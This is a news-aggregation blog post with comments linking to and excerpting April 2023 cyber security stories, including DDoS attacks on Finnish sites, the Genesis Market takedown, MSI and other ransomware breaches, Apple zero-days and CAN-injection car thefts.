This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
352 Comments
Tomi Engdahl says:
Yleen kohdistui palvelunestohyökkäys
Ylen verkkopalveluihin kohdistui palvelunestohyökkäys eilen tiistaina.
https://www.iltalehti.fi/digiuutiset/a/2111d1ff-9185-4abb-987c-a56d20cee0a1
Tiistaina 4.4. palvelunestohyökkäyksiä kohdistettiin Helsingin seudun liikenteen (HSL) sekä Eduskunnan verkkosivuille. Yleisradio tiedottaa joutuneensa myös hyökkäyksen uhriksi.
Palvelunestohyökkäys sattui iltapäivällä. Yle kertoo pystyneensä rajoittamaan hyökkäyksen vaikutuksia, minkä vuoksi se ei näkynyt palveluiden käyttäjille.
– Yle on huoltovarmuuskriittinen yhtiö ja meillä on velvollisuus varmistaa, että palvelumme toimivat. Siksi olemme varautuneet tämän tyyppisiin tilanteisiin, teknologiajohtaja Janne Yli-Äyhö kertoo tiedotteessa.
– Pystyimme reagoimaan nopeasti ja asiantuntijamme saivat palvelunestohyökkäyksen vaikutukset minimoitua.
Yli-Äyhö ei osaa sanoa, liittyikö Yleen kohdistettu hyökkäys muihin samana päivänä tehtyihin hyökkäyksiin.
– On pelkkää arvailua, liittyykö Yleä vastaan tehty hyökkäys näihin, mutta kyllä se ajallisesti osuu yhteen.
Tiedotteen mukaan palvelunestohyökkäysten yrityksiä havaitaan ja torjutaan säännöllisesti.
Tomi Engdahl says:
Samsung workers made a major error by using ChatGPT
By Lewis Maddison published 1 day ago
Samsung meeting notes and new source code are now in the wild after being leaked in ChatGPT
https://www.techradar.com/news/samsung-workers-leaked-company-secrets-by-using-chatgpt
Samsung workers have unwittingly leaked top secret data whilst using ChatGPT to help them with tasks.
The company allowed engineers at its semiconductor arm to use the AI writer to help fix problems with their source code. But in doing so, the workers inputted confidential data, such as the source code itself for a new program, internal meeting notes data relating to their hardware.
The upshot is that in just under a month, there were three recorded incidences of employees leaking sensitive information via ChatGPT. Since ChatGPT retains user input data to further train itself, these trade secrets from Samsung are now effectively in the hands of OpenAI, the company behind the AI service.
In one of the aforementioned cases, an employee asked ChatGPT to optimize test sequences for identifying faults in chips, which is confidential – however, making this process as efficient as possible has the potential to save chip firms considerable time in testing and verifying processors, leading to reductions in cost too.
In another case, an employee used ChatGPT to convert meeting notes into a presentation, the contents of which were obviously not something Samsung would have liked external third parties to have known.
Samsung Electronics sent out a warning to its workers on the potential dangers of leaking confidential information in the wake of the incidences, saying that such data is impossible to retrieve as it is now stored on the servers belonging to OpenAI. In the semiconductor industry, where competition is fierce, any sort of data leak could spell disaster for the company in question.
It doesn’t seem as if Samsung has any recourse to request the retrieval or deletion of the sensitive data OpenAI now holds. Some have argued(opens in new tab) that this very fact makes ChatGPT non-compliant with the EU’s GDPR, as this is one of the core tenants of the law governing how companies collect and use data. It is also one of the reasons why Italy has now banned the use of ChatGPT nationwide
Tomi Engdahl says:
Palvelunestohyökkäys myös Yleä vastaan saatiin torjuttua onnistuneesti
https://www.tivi.fi/uutiset/tv/b616c95f-ed6a-4284-87d2-5e521183cec0
Tiistaina 4.4. kohdistettiin palvelunestohyökkäyksiä Helsingin seudun liikenteen (HSL) sekä Eduskunnan verkkosivuille. Myös Yleisradio tiedottaa joutuneensa hyökkäyksen uhriksi. Palvelunestohyökkäys sattui iltapäivällä. Yle kertoo pystyneensä rajoittamaan hyökkäyksen vaikutuksia, minkä vuoksi se ei näkynyt palveluiden käyttäjille. “Yle on huoltovarmuuskriittinen yhtiö ja meillä on velvollisuus varmistaa, että palvelumme toimivat. Siksi olemme varautuneet tämän tyyppisiin tilanteisiin, teknologiajohtaja Janne Yli-Äyhö kertoo tiedotteessa
Tomi Engdahl says:
FBI seizes stolen credentials market Genesis in Operation Cookie Monster https://www.bleepingcomputer.com/news/security/fbi-seizes-stolen-credentials-market-genesis-in-operation-cookie-monster/
The domains and infrastructure for Genesis Market, one of the most popular marketplaces for stolen credentials of all types, were seized by law enforcement earlier this week as part of Operation Cookie Monster. The action is an important blow to the cybercriminal world as Genesis was one of the major players offering both consumer and corporate account identities
Tomi Engdahl says:
Hackers can open Nexx garage doors remotely, and there’s no fix https://www.bleepingcomputer.com/news/security/hackers-can-open-nexx-garage-doors-remotely-and-theres-no-fix/
Multiple vulnerabilities discovered Nexx smart devices can be exploited to control garage doors, disable home alarms, or smart plugs. There are five security issues disclosed publicly, with severity scores ranging from medium to critical that the vendor has yet to acknowledge and fix. The most significant discovery is the use of universal credentials that are hardcoded in the firmware and also easy to obtain from the client communication with Nexx’s API. A video showing the impact of the security flaw, tracked as CVE-20231748, is available below. It could be used to open any Nexx-controlled garage door
Tomi Engdahl says:
120 Arrested as Cybercrime Website Genesis Market Seized by FBI
https://www.securityweek.com/cybercrime-website-genesis-market-seized-by-fbi/
The FBI has seized Genesis Market, a major cybercrime website offering stolen device fingerprints.
The Genesis Market cybercrime website appears to have been taken down as part of an international law enforcement operation.
The domains associated with Genesis Market currently display an image informing visitors that the website has been seized by the FBI based on a warrant issued by a Wisconsin court.
The new Genesis Market homepage reveals that the domains were seized as part of an operation named ‘Cookie Monster’, with over a dozen European and North American law enforcement agencies being credited for their role in the takedown.
Authorities in the US and Europe have yet to issue a statement on the seizure of Genesis Market.
Security blogger Brian Krebs reported that the law enforcement operation also involved dozens of arrests in the United States and other countries.
However, the message posted by the FBI on seized domains — which instructs those who have been in contact with Genesis administrators to contact the agency — suggests that the site’s operators have yet to be identified or captured.
The Genesis marketplace has been around since late 2018, offering cybercriminals access to hundreds of thousands of so-called ‘bots’ that could be used to carry out malicious activities and bypass anti-fraud systems.
These bots, which are actually browser fingerprints obtained by information-stealing malware, provide cybercriminals the credentials needed to access various services and systems while making it seem like the access request is coming from the legitimate user’s machine, thus avoiding triggering any alarms.
“Genesis marketplace was an invite-only cybercrime institution that held data on account holders from almost all major websites,” said Mark Lamb, CEO of HighGround.io. “The operators offered customers a pre-made package on victims, enabling them to access accounts and execute attacks quickly, with all the information they needed to commit fraud. Unfortunately, very few victims were aware they had been compromised until money was stolen or goods were purchased, as there was nothing malicious for threat detection tools to alert on.”
FBI Seizes Bot Shop ‘Genesis Market’ Amid Arrests Targeting Operators, Suppliers
https://krebsonsecurity.com/2023/04/fbi-seizes-bot-shop-genesis-market-amid-arrests-targeting-operators-suppliers/
Tomi Engdahl says:
Tax Return Filing Service eFile.com Caught Serving Malware
https://www.securityweek.com/tax-return-filing-service-efile-com-caught-serving-malware/
Online tax return filing service eFile.com was injected with malicious JavaScript code serving malware to visitors.
eFile.com, an online service that helps individuals file tax returns, was injected with malicious code that led to malware being delivered to visitors.
The software service, which is authorized by the Internal Revenue Service (IRS), albeit not operated by the agency, was seen serving malware for several weeks, until it was cleaned up earlier this week.
The eFile.com compromise was initially observed in mid-March, when a user posted on Reddit the first details of the issue: visitors were redirected to a fake ‘network error’ page and were served a fake browser update.
When clicking on the ‘browser update’ link, users were served one of two executables, named ‘update.exe’ and ‘installer.exe’.
On Monday, Johannes Ullrich of the SANS Internet Storm Center revealed that the malicious files had very low detection rates on VirusTotal. He also discovered that ‘update.exe’ was signed with a valid certificate from Sichuan Niurui Science and Technology Co., Ltd.
Tomi Engdahl says:
https://www.securityweek.com/kpmg-tackles-ai-security-with-cranium-spinout/
Tomi Engdahl says:
https://www.securityweek.com/chrome-112-patches-16-security-flaws/
Tomi Engdahl says:
Mobile & Wireless
Android’s April 2023 Updates Patch Critical Remote Code Execution Vulnerabilities
https://www.securityweek.com/androids-april-2023-updates-patch-critical-remote-code-execution-vulnerabilities/
Android’s April 2023 security updates were released this week with patches for two critical-severity vulnerabilities leading to remote code execution.
Tomi Engdahl says:
Maija maksoi 1000 euroa huippupuhelimesta ja ihmetteli sen kehnoa toimintaa – Käynti kaupassa paljasti puhelimen väärennetyksi
Nettikirpputoreilla saa olla varuillaan. Iltalehden lukija Maija kertoi tarinastaan ostaessaan uutta puhelinta.
Väärennöksen ja oikean puhelimen näytöissä on eroa. Muuten laite näyttää ulkoisesti samalta.
https://www.iltalehti.fi/digiuutiset/a/2927e89a-e078-461f-9041-7a95888e1732
Maija osti nettikirpputorilta Samsungin uuden Galaxy S23 Ultra -huippupuhelimen yli tuhannella eurolla. Aidolta vaikuttava ostos ei lopulta ollutkaan sitä mitä myyjä oli luvannut Maijalle.
Tietotekniikan alalla toimiva Maija lähti selvittämään puhelimen aitoutta. Puhelimen tunnistuksessa käytettävä yksilöllinen IMEI-koodi piti paikkansa. Tilanne oli kummallinen.
Käyttöjärjestelmän päivityksiä tehdessä paljastui, että uudessa puhelimessa oli yli kolme vuotta vanha käyttöjärjestelmä. Googlen sovelluskauppaan kirjautuessa kauppa tunnisti puhelimen täysin muuksi mitä Maija luuli uuden puhelimensa olevan. Sovelluskaupan mukaan Maijan ostama puhelin olikin todellisuudessa Samsungin GalaxyNote10. Se on toki ilmestyessään vuonna 2019 ollut huippupuhelin, mutta neljän vuoden aikana jo pudonnut kauas kärjestä – olihan mallin valmistaminenkin lopetettu jo 2021.
Maijan ostaman puhelimen IMEI-koodi oli todennäköisesti kloonattu. Maija ei saanut netissä olevaan myyjään enää yhteyttä, ja totesi tässä vaiheessa tulleensa ovelan huijauksen uhriksi.
Väärennökset harvinaisia
Uusissa puhelimissa tämänlaisen väärennöksen tekeminen ei ole helppo tehtävä. Lifewire-sivuston mukaan puhelimen IMEI-koodin kloonaus on myös laitonta suuressa osaa maailmaa.
– Väärennetyt Samsung-puhelimet ovat Suomessa erittäin harvinaisia, Samsung Suomen maajohtaja Mika Engblom kertoo.
Techlicious-sivusto kertoo, että kloonausta voidaan tehdä esimerkiksi vakoilutarkoituksessa.
Väärennettyjä puhelimia on ollut liikkeellä viime vuosina runsaasti.
How to Tell if Your Phone Has Been Cloned
https://www.techlicious.com/tip/how-to-tell-if-your-phone-has-been-cloned/
Our phones are the key to our digital identity, so it’s no wonder that mobiles have become increasingly attractive targets for cybercriminals, who have at their disposal a fair number of ways to hack a smartphone, some of which require more access and technical savvy than others.
Phone cloning – or the copying of the identification credentials a phone uses to connect to cellular networks – is one method that usually requires the perpetrator to have direct access to a device. That makes it less prevalent than, say, hacking an operating system vulnerability that hasn’t been updated, but the consequences are equal to that of most phone hacks – your personal data is exposed, with potential financial consequences or identity fraud.
How to Clone a Phone Without Ever Touching It
You don’t even need to touch your phone to save all your data.
https://www.lifewire.com/how-to-clone-phone-without-touching-it-4570908
What to Know
Install Dr.Fone on your PC or Mac and connect the phone you want to copy, then connect another phone to transfer the copied data.
For Android only: Install CLONEit on both mobile devices to transfer all data from one phone to another over Wi-Fi.
The device you copy your phone’s data to may need its own SIM card to work.
Tomi Engdahl says:
https://www.tekniikkatalous.fi/uutiset/samsungin-nolo-moka-nain-ei-chatgptta-kannata-kayttaa/5671ee58-2102-416a-9b1f-92d0b644e7f1
Tomi Engdahl says:
https://www.popsci.com/technology/nexx-garage-door-cyber-vulnerability/
Tomi Engdahl says:
Applen tietokoneista paljastui salaisuus – niihin on piilotettu outo tiedosto, joka ei sinne kuulu https://www.is.fi/digitoday/art-2000009504810.html
Käyttöjärjestelmään kätketty pdf-tiedosto määrittelee bitcoin-virtuaalivaluutan perusteet.
Tomi Engdahl says:
https://www.washingtonpost.com/technology/2023/04/04/dish-network-data-breach-advice/
Tomi Engdahl says:
Nämä ovat vaarallisimmat tiedostot – hakkeri kertoo, miten kannattaa suojautua https://www.is.fi/digitoday/tietoturva/art-2000009496559.html
Tomi Engdahl says:
MSI Reportedly Hacked by Money Message Ransomware Gang, Source Code Stolen
MSI Listed on Ransomware Gang’s Extortion Portal, Threatens to Leak Stolen Source Code.
https://www.cyberkendra.com/2023/04/msi-reportedly-hacked-by-money-message.html
Tomi Engdahl says:
Tesla workers shared sensitive images recorded by customer cars
Some of the camera footage showed “intimate” moments, images of Tesla owners’ children or property — some of which was shared internally, Reuters reported.
https://www.nbcnews.com/business/business-news/tesla-workers-shared-sensitive-images-recorded-by-customer-cars-rcna78502
Tomi Engdahl says:
Tesla Driver Freaked Out After App Allows Him to Drive Off With the Wrong Car
“My family is not feeling safe right now.”
https://futurism.com/tesla-driver-unlocks-wrong-car-app
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/technology/flipper-zero-banned-by-amazon-for-being-a-card-skimming-device-/
Tomi Engdahl says:
MSI hit in cyberattack, warns against installing knock-off firmware
1.5TB of databases, source code, BIOS tools said to be stolen
https://www.theregister.com/2023/04/07/msi_cyberattack_bios/
Owners of MSI-brand motherboards, GPUs, notebooks, PCs, and other equipment should exercise caution when updating their device’s firmware or BIOS after the manufacturer revealed it has recently suffered a cyberattack.
In a statement shared on Friday, MSI urged users “to obtain firmware/BIOS updates only from its official website,” and to avoid using files from other sources.
https://www.msi.com/news/detail/MSI-Statement-141688
Tomi Engdahl says:
WinRAR SFX archives can run PowerShell without being detected
https://www.bleepingcomputer.com/news/security/winrar-sfx-archives-can-run-powershell-without-being-detected/
Hackers are adding malicious functionality to WinRAR self-extracting archives that contain harmless decoy files, allowing them to plant backdoors without triggering the security agent on the target system.
Self-extracting archives (SFX) created with compression software like WinRAR or 7-Zip are essentially executables that contain archived data along with a built-in decompression stub (the code for unpacking the data). SFX files can be password-protected to prevent unauthorized access.
Tomi Engdahl says:
https://arstechnica.com/gadgets/2023/04/google-drive-cancels-its-surprise-file-cap-promises-to-communicate-better/
Tomi Engdahl says:
Zero Trust -periaatetta soveltaa jo yli puolet organisaatioista
https://www.advania.fi/blogi/zero-trust-periaatetta-soveltaa-jo-yli-puolet-organisaatioista
Tomi Engdahl says:
Pirullinen Omakanta-huijaus vaanii suomalaisia: Haet terveystietoja, menetätkin rahasi
Huijauksia on raportoitu muun muassa Omaveron ja Omakannan palveluista.
https://www.iltalehti.fi/tietoturva/a/a65d0800-3852-4e51-8a35-5c4ae54deafb
Viime aikoina on raportoitu runsaasti nettihuijauksien uhreiksi joutuneista, jotka ovat käyttäneet Suomen viranomaisten nettipalveluita. Asiasta on varoittanut Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus.
Huijaukset tapahtuvat Googlen mainosten avulla. Tapauksissa viraston nettipalveluita hakeva uhri klikkaa viralliseksi linkiksi naamioitua mainosta. Linkki ohjaa oikean näköiselle sivustolle, joka on todellisuudessa huijaussivusto. Ainakin Omavero ja Omakanta -sivustoista on tehty aidoilta näyttävät huijausversiot.
Tomi Engdahl says:
https://www.kyberturvallisuuskeskus.fi/fi/huijarit-kaappaavat-pankkitunnuksia-omakannan-ja-suomifi-palvelun-nimissa
Tomi Engdahl says:
Suomalaisten puhelinnumeroita väärissä käsissä älä usko tällaista soittajaa
https://www.tivi.fi/uutiset/tv/25e64b48-6e94-4850-b981-c2dc012d6907
Traficomin Kyberturvallisuuskeskus tiedottaa saaneensa viime viikkoina useita ilmoituksia suomalaisten puhelinnumeroiden käytöstä huijaus- ja häiriöpuheluissa. Ilmoitusten määrä on ollut selkeässä nousussa.
Soittajan puhelinnumeron, eli niin kutsutun A-numeron, väärentäminen on yleisesti käytetty tekniikka. Sen avulla rikolliset saavat soittajan numeron vastaamaan suomalaista jo käytössä olevaa puhelinnumeroa. Kotimainen numero on usein vakuuttavampi kuin ulkomailta tuleva soitto. Soitot on kuitenkin yleensä tehty englannin kielellä
Tomi Engdahl says:
Medusa ransomware claims attack on Open University of Cyprus https://www.bleepingcomputer.com/news/security/medusa-ransomware-claims-attack-on-open-university-of-cyprus/
The Medusa ransomware gang has claimed a cyberattack on the Open University of Cyprus (OUC), which caused severe disruptions of the organization’s operations. OUC is an online university based in Nicosia, Cyprus, that provides remote learning. It offers 30 higher-level education programs to 4,200 students and participates in various scientific research activities. Last week, the university published an announcement about a cyberattack that had occurred on March 27, that resulted in several central services and critical systems going offline
Tomi Engdahl says:
Western Digital confirms breach, affects My Cloud and SanDisk users https://www.malwarebytes.com/blog/news/2023/04/western-digital-confirms-breach-affects-my-cloud-and-sandisk-users
Western Digital, a big brand in digital storage, says it has suffered a “network security incidentpotentially ransomwarewhich resulted in a breach and some system disruptions in its business operations. The company identified the incident on March 26 and said an unnamed third party unlawfully accessed several computer systems to steal data. The investigation is ongoing and Western Digital has yet to learn how much was taken
Tomi Engdahl says:
Money Message ransomware gang claims MSI breach, demands $4 million https://www.bleepingcomputer.com/news/security/money-message-ransomware-gang-claims-msi-breach-demands-4-million/
Taiwanese PC parts maker MSI (Micro-Star International) has been listed on the extortion portal of a new ransomware gang known as “Money Message,” which claims to have stolen source code from the company’s network. MSI is a global hardware giant that makes motherboards, graphics cards, desktops, laptops, servers, industrial systems, PC peripherals, and infotainment products, with an annual revenue that surpasses $6.5 billion. The threat actor has listed MSI on its data leak website and posted screenshots of what they claim to be the hardware vendor’s CTMS and ERP databases and files containing software source code, private keys, and BIOS firmware
Tomi Engdahl says:
MERCURY and DEV-1084: Destructive attack on hybrid environment https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/
Microsoft Threat Intelligence has detected destructive operations enabled by MERCURY, a nation-state actor linked to the Iranian government, that attacked both on-premises and cloud environments.
While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation.
Previous MERCURY attacks have been observed targeting on-premises environments, however, the impact in this case notably also included destruction of cloud resources. Microsoft assesses that MERCURY likely worked in partnership with another actor that Microsoft tracks as DEV-1084, who carried out the destructive actions after MERCURYs successful operations had gained access to the target environment
Tomi Engdahl says:
Apple fixes two zero-days exploited to hack iPhones and Macs https://www.bleepingcomputer.com/news/apple/apple-fixes-two-zero-days-exploited-to-hack-iphones-and-macs/
Apple has released emergency security updates to address two new zero-day vulnerabilities exploited in attacks to compromise iPhones, Macs, and iPads. “Apple is aware of a report that this issue may have been actively exploited,” the company said when describing the issues in security advisories published on Friday. The first security flaw (tracked as CVE-2023-28206) is an IOSurfaceAccelerator out-of-bounds write that could lead to corruption of data, a crash, or code execution. Successful exploitation allows attackers to use a maliciously crafted app to execute arbitrary code with kernel privileges on targeted devices. The second zero-day (CVE-2023-28205) is a WebKit use after free weakness that allows data corruption or arbitrary code execution when reusing freed memory
Tomi Engdahl says:
MSI confirms security breach following ransomware attack claims http://bleepingcomputer.com/news/security/msi-confirms-security-breach-following-ransomware-attack-claims/
Following reports of a ransomware attack, Taiwanese PC vendor MSI (short for Micro-Star International) confirmed today that its network was breached in a cyberattack. Earlier this week, the Money Message ransomware gang allegedly infiltrated some of MSI’s systems and stole files that will be leaked online next week if the company refuses to pay a $4 million ransom. In a Friday filing with Taiwan’s Stock Exchange (TWSE), first spotted by PCMag, MSI revealed that some of its information service systems had been affected by a cyberattack reported to the relevant authorities. “After detecting some information systems being attacked by hackers, MSI’s IT department has initiated information security defense mechanism and recovery procedures. The Company also has been reported [sic] the anomaly to the relevant government authorities,” MSI said
Tomi Engdahl says:
Visitors of tax return e-file service may have downloaded malware https://www.malwarebytes.com/blog/news/2023/04/visitors-of-tax-return-e-file-service-may-have-downloaded-malware
The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript
(JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS’ e-file infrastructure and other similar-sounding domains. As of this writing, eFile.com is clean. Users can access it without worry
Tomi Engdahl says:
Security headers you should add into your application to increase cyber risk protection
https://isc.sans.edu/diary/Security+headers+you+should+add+into+your+application+to+increase+cyber+risk+protection/29720
Web applications are a wide world that is currently the object of numerous cyberattacks, mostly seeking to compromise the information directly in the clients that use them. Considering the shortage of programmers, most of them are looking to finish the developments that are requested in the shortest periods of time. Although development frameworks carry out some default protection for attacks such as SQL Injection, the same is not the case for other types of attacks. I have been able to demonstrate the framework’s default security protections in multiple developments, which opens up vulnerable scenarios as the ones described.other scenarios such as man-in-the-middle attacks (MITM), cross-site scripting and cross-site injections
Tomi Engdahl says:
With ICMP magic, you can snoop on vulnerable HiSilicon, Qualcomm-powered Wi-Fi https://www.theregister.com/2023/04/07/wifi_access_icmp/
A vulnerability identified in at least 55 Wi-Fi router models can be exploited by miscreants to spy on victims’ data as it’s sent over a wireless network. Eggheads in China and the US have published details of a security shortcoming in the network processing units (NPUs) in Qualcomm and HiSilicon chips found at the heart of various wireless access points (APs). The flaw (CVE-2022-25667) prevents the devices from blocking forged Internet Control Message Protocol (ICMP) messages; these messages can be abused to hijack and observe a victim’s wireless connectivity. ICMP is a network layer protocol primarily used for diagnosing network traffic issues. It’s mainly used for error reporting, though it can be misused for denial of service via ICMP flood attacks
Tomi Engdahl says:
Exploit available for critical bug in VM2 JavaScript sandbox library https://www.bleepingcomputer.com/news/security/exploit-available-for-critical-bug-in-vm2-javascript-sandbox-library/
Proof-of-concept exploit code has been released for a recently disclosed critical vulnerability in the popular VM2 library, a JavaScript sandbox that is used by multiple software to run code securely in a virtualized environment. The library is designed to run untrusted code in an isolated context on Node.js servers. It allows partial execution of the code and prevents unauthorized access to system resources or to external data. VM2 has more than 16 million monthly downloads via the NPM package repository and it is used by integrated development environments (IDEs) and code editors, function-as-a-service (FaaS) solutions, pen-testing frameworks, security tools, and various JavaScript-related products
Tomi Engdahl says:
Apple on Friday pushed out a major iOS security update to fix a pair of zero-day vulnerabilities already being exploited in the wild.
The newest iOS 16.4.1 and iPadOS 16.4.1 updates cover code execution software flaws in IOSurfaceAccelerator and WebKit, suggesting a complex exploit chain was detected in the wild hitting the latest iPhone devices.
“Apple is aware of a report that this issue may have been actively exploited,” Cupertino says in a barebones advisory that credits Google and Amnesty International with reporting the issue.
Vulnerabilities
Apple Ships Urgent iOS Patch for Newly Exploited Zero-Days
The newest iOS 16.4.1 and iPadOS 16.4.1 patches a pair of code execution flaws that have already been exploited in the wild.
https://www.securityweek.com/apple-ships-urgent-ios-patch-for-newly-exploited-zero-days/
Apple fixes two zero-days exploited to hack iPhones and Macs https://www.bleepingcomputer.com/news/apple/apple-fixes-two-zero-days-exploited-to-hack-iphones-and-macs/
Apple has released emergency security updates to address two new zero-day vulnerabilities exploited in attacks to compromise iPhones, Macs, and iPads. “Apple is aware of a report that this issue may have been actively exploited,” the company said when describing the issues in security advisories published on Friday. The first security flaw (tracked as CVE-2023-28206) is an IOSurfaceAccelerator out-of-bounds write that could lead to corruption of data, a crash, or code execution. Successful exploitation allows attackers to use a maliciously crafted app to execute arbitrary code with kernel privileges on targeted devices. The second zero-day (CVE-2023-28205) is a WebKit use after free weakness that allows data corruption or arbitrary code execution when reusing freed memory
Tomi Engdahl says:
Breached shutdown sparks migration to ARES data leak forums https://www.bleepingcomputer.com/news/security/breached-shutdown-sparks-migration-to-ares-data-leak-forums/
A threat group called ARES is gaining notoriety on the cybercrime scene by selling and leaking databases stolen from corporations and public authorities. The actor emerged on Telegram in late 2021 and has been associated with the RansomHouse ransomware operation and the data leak platform, KelvinSecurity, and the network access group Adrastea.
ARES Group manages its own site with database leaks and a forum, which may fill the void left by the now defunct Breached forum. Cyfirma reports that ARES displays a cartel-like behavior, actively seeking affiliations with other threat actors
Tomi Engdahl says:
Microsoft Netlogon: Potential Upcoming Impacts of CVE-2022-38023
https://isc.sans.edu/diary/Microsoft+Netlogon+Potential+Upcoming+Impacts+of+CVE202238023/29728
This has been brought to our attention by a reader (thank you, William!). The vulnerability CVE-2022-38038 affected the Microsoft Netlogon procedure with an RPC escalation of privilege vulnerability.
Microsoft provided a patch to fix it. It improves the Netlogon security by enforcing RPC sealing instead of signing off the communication with the Domain Controller. RPC sealing is a security measure that both signs and encrypts the messages sent over the wire by the Netlogon protocol. Microsoft released a knowledge base article with more information about the technique used to fix the vulnerability
Tomi Engdahl says:
CISA orders agencies to patch Backup Exec bugs used by ransomware gang https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-backup-exec-bugs-used-by-ransomware-gang/
On Friday, U.S. Cybersecurity and Infrastructure Security Agency
(CISA) increased by five its list of security issues that threat actors have used in attacks, three of them in Veritas Backup Exec exploited to deploy ransomware. One of the vulnerabilities was exploited as zero-day as part of an exploit chain that targeted Samsungs web browser and another that allows attackers to increase privileges on Windows machines. Of the five vulnerabilities that CISA added to the catalog of Known Exploited Vulnerabilities (KEV) today, only one was rated critical, an issue in Veritas data protection software tracked as CVE-2021-27877 that allows remote access and command execution with elevated privileges
Tomi Engdahl says:
CISA orders govt agencies to update iPhones, Macs by May 1st https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-update-iphones-macs-by-may-1st/
The Cybersecurity and Infrastructure Security Agency (CISA) ordered federal agencies to patch two security vulnerabilities actively exploited in the wild to hack iPhones, Macs, and iPads. According to a binding operational directive (BOD 22-01) issued in November 2022, Federal Civilian Executive Branch Agencies (FCEB) agencies are required to patch their systems against all security bugs added to CISA’s Known Exploited Vulnerabilities catalog. FCEB agencies now have to secure iOS, iPadOS, and macOS devices until May 1st, 2023, against two flaws addressed by Apple on Friday and added to CISA’s list of bugs exploited in attacks on Monday
Tomi Engdahl says:
Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign https://thehackernews.com/2023/04/over-1-million-wordpress-sites-infected.html
Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to breach WordPress sites. The attacks are known to play out in waves once every few weeks. “This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites,” security researcher Denis Sinegubko said
Tomi Engdahl says:
KFC, Pizza Hut owner discloses data breach after ransomware attack https://www.bleepingcomputer.com/news/security/kfc-pizza-hut-owner-discloses-data-breach-after-ransomware-attack/
Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack. This comes after the company said that although some data was stolen from its network, it has no evidence that the attackers exfiltrated any customer information. In the breach notification letters sent to affected people starting Thursday, Yum! Brands revealed that it has now found out the attackers stole some individuals’ personal information, including names, driver’s license numbers, and other ID card numbers
Tomi Engdahl says:
Thieves Use CAN Injection Hack to Steal Cars
https://www.securityweek.com/thieves-use-can-injection-hack-to-steal-cars/
An innocent-looking portable speaker can hide a hacking device that launches CAN injection attacks, which have been used to steal cars.
A hacking device can allow thieves to steal a wide range of car models using an attack method named CAN injection, researchers have revealed.
Automotive cybersecurity experts Ian Tabor of the EDAG Group and Ken Tindell, CTO of Canis Automotive Labs, started analyzing these attacks after Tabor had his 2021 Toyota RAV4 stolen last year.
The car was stolen after on two occasions Tabor found that someone had pulled apart his headlight and unplugged the cables. What initially appeared as vandalism turned out to be part of an attempt to steal the vehicle.
Specifically, the thieves pulled off the bumper and unplugged the headlight cables in an attempt to reach wires connected to an electronic control unit (ECU) responsible for the vehicle’s smart key.
An investigation conducted by Tabor showed that the thieves likely connected a special hacking device that allowed them to unlock the vehicle and drive away.
Such hacking devices can be acquired on dark web sites for up to €5,000 ($5,500), and they are often advertised as ‘emergency start’ devices that can be used by vehicle owners who have lost their keys or automotive locksmiths. In the case of the device designed for Toyota cars, the electronics responsible for hacking the vehicle are hidden inside a Bluetooth speaker case.
The hacking device is designed to conduct what the researchers call a CAN injection attack. These devices appear to be increasingly used by thieves. At least one theft was caught by CCTV cameras in London
The researchers analyzed diagnostics data from Tabor’s stolen RAV4 and such a CAN injection device in an effort to see how they work.
Modern cars have several ECUs, each responsible for a different system, such as headlights, climate control, telematics, cameras, engine control, and the smart key that unlocks and starts the vehicle. ECUs are connected together through controller area network (CAN) buses.
The attacker does not need to directly connect to the smart key ECU. Instead, they can reach the smart key ECU from the wires connected to, for example, the headlight, as long as the headlight and the smart key ECU are on the same CAN bus.
The attacker connects the hacking device to the headlight wires and can send a specially crafted CAN message that tells the smart key receiver ECU that the key is validated. The attacker can then send a specially crafted CAN message to the door ECU to unlock the door. This allows the thieves to get in the car and drive away.
The attack can be carried out by connecting the hacking device to other CAN wires as well, but the ones in the headlight are often the most accessible and connecting to them does not involve causing too much damage to the car, which would lower its value.
While in this case the stolen vehicle was a Toyota and the hacking device tested by the researchers is specifically designed for Toyota cars, the problem is not specific to Toyota.
Similar hacking devices offered for sale to car thieves target many brands, including BMW, GMC, Cadillac, Chrysler, Ford, Honda, Jaguar, Jeep, Maserati, Nissan, Peugeot, Renault, and Volkswagen.
Tomi Engdahl says:
Success of Genesis Market Takedown Attempt Called Into Question
https://www.securityweek.com/success-of-genesis-market-takedown-attempt-called-into-question/
Law enforcement announced the takedown of Genesis Market, but the impact on the cybercrime marketplace’s infrastructure may be limited.
Law enforcement agencies in several countries have worked together to disrupt a notorious cybercrime website called Genesis Market, but there is evidence that the takedown attempt’s impact — particularly on infrastructure — may be limited.
Launched in 2018, Genesis is an invite-only marketplace that has been offering so-called ‘bots’ that provide cybercriminals with access to online accounts and systems.
These bots are created using information obtained by malware from infected devices. Each bot contains not only credentials required to access the victim’s accounts, but also device fingerprints (cookies and browser data) that enable hackers to gain access to the desired resource without triggering any alarms because the request appears to be coming from the legitimate user’s device.
Law enforcement agencies in the United States, Europe and Australia announced the results of an operation against Genesis Market on Wednesday. The operation, named ‘Cookie Monster’, involved 17 countries and resulted in roughly 120 arrests and 200 property searches.
Investigators said Genesis has offered data from over 1.5 million compromised computers, totaling more than 80 million account credentials. While many of these credentials are associated with banking, social media and email accounts, some provide access to government systems. The FBI said the site’s operators have earned $8.7 million in cryptocurrency.
Court documents revealed that investigators managed to gain access to backend servers and other infrastructure supporting Genesis, which enabled them to take control of several domains.
